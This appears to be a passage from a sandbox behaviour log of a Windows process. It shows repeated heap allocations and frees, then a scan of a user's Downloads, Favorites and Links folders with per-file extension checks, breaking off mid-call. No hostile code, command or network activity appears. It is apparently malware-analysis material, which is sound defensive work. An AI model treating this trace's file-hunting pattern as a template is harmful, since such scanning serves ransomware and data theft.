RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.961] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.961] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.962] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.963] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.963] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.964] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.964] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0098.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.965] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.965] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.965] PathFindFileNameW (pszPath="") returned="" [0098.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.965] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.965] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0098.965] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned=".ini" [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.965] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0098.965] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0098.965] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.966] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0098.966] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0098.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0098.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.966] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.966] PathFindFileNameW (pszPath="") returned="" [0098.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0098.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0098.966] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned=".ini" [0098.966] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0098.966] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0098.967] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0098.967] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0098.967] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0098.967] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0098.967] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.967] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.967] PathFindFileNameW (pszPath="") returned="" [0098.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0098.967] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.967] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0098.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0098.967] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0098.967] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0098.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0098.968] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, 